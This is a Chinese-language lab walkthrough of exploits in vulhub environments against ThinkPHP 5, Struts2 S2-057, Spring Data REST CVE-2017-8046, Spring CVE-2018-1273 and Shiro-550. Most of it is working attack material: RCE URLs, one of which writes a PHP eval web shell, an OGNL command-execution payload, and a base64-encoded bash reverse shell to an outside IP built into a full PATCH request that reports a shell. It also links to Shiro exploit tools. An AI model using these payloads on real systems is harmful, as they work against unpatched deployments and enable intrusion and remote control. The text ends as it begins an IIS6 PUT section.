常见框架漏洞

Thinkphp 之 5-rce

靶场 vulhub/thinkphp/5-rce

漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖，通过覆盖类的核心属性filter导致rce，其攻击点较为多，有些还具有限制条件，另外由于种种部分原因，在利用上会出现一些问题。

远程命令执行

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

将php代码写入文件，并访问

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>

写入一个一句话木马

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell2.php&vars[1][]=<?php eval($_POST[cmd]);?>

shell工具连接

struts2之s2-057

vulhub靶机

访问靶场

ip/struts2-showcase

输入以下url
http://1.92.134.1:8080/struts2-showcase/${(123+123)}/actionChain1.action
页面回显
http://1.92.134.1:8080/struts2-showcase/246/register2.action

把上面验证payload的值修改为我们的利用exp

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

然后经过url编码放入上方位置中即可看到代码被执行whoami

spring之CVE-2017-8046

靶场 spring/CVE-2017-8046

服务器在处理PATCH请求时，攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器，通过构造好的JSON数据来执行任意Java代码

打开环境后看到

访问customers，得到

{
  "_embedded" : {
    "customers" : [ {
      "firstname" : "Dave",
      "lastname" : "Matthews",
      "gender" : "MALE",
      "address" : {
        "street" : "4711 Some Place",
        "zipCode" : "54321",
        "city" : "Charlottesville",
        "state" : "VA"
      },
      "_links" : {
        "self" : {
          "href" : "http://1.92.134.1:8080/customers/1"
        },
        "customer" : {
          "href" : "http://1.92.134.1:8080/customers/1"
        }
      }
    } ]
  },
  "_links" : {
    "self" : {
      "href" : "http://1.92.134.1:8080/customers"
    },
    "profile" : {
      "href" : "http://1.92.134.1:8080/profile/customers"
    }
  }
}

可以利用代码块生成Ascii的命令

payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

bash -i >& /dev/tcp/192.168.177.142/6666 0>&1
base64

反弹编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Ny4xNDIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

拼接payload
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Ny4xNDIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)


98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,78,121,52,120,78,68,73,118,78,106,89,50,78,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

访问customers/1 添加content-type 以及最后的payload访问即可

PATCH /customers/1 HTTP/1.1
Host: 192.168.177.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json-patch+json
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 461

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,78,121,52,120,78,68,73,118,78,106,89,50,78,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]

成功获得shell

spring之CVE-2018-1273

安装靶场 访问项目地址/users

填写信息bp抓包

写入poc

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

终端查看信息

docker exec -it 08d7538b367f /bin/bash

反弹shell改日再弹。

Shiro之rememberMe反序列化漏洞（Shiro-550）

vulhub靶场 /shiro/CVE-2016-4437

使⽤BurpSuite进⾏抓包，在请求包中的cookie字段中添加rememberMe=123;，看响应包 header中是否返回 rememberMe=deleteMe值，若有，则证明该系统使⽤了Shiro框架：

使用工具进行攻击，手工，别搞笑了

https://github.com/j1anFen/shiro_attack

https://github.com/feihong-cs/ShiroExploit-Deprecated反弹shell工具

中间件系列

iis6.x篇

PUT漏洞复现

准备复现winser2003 开启webdav

开启写入

抓包查看支持协议，提交options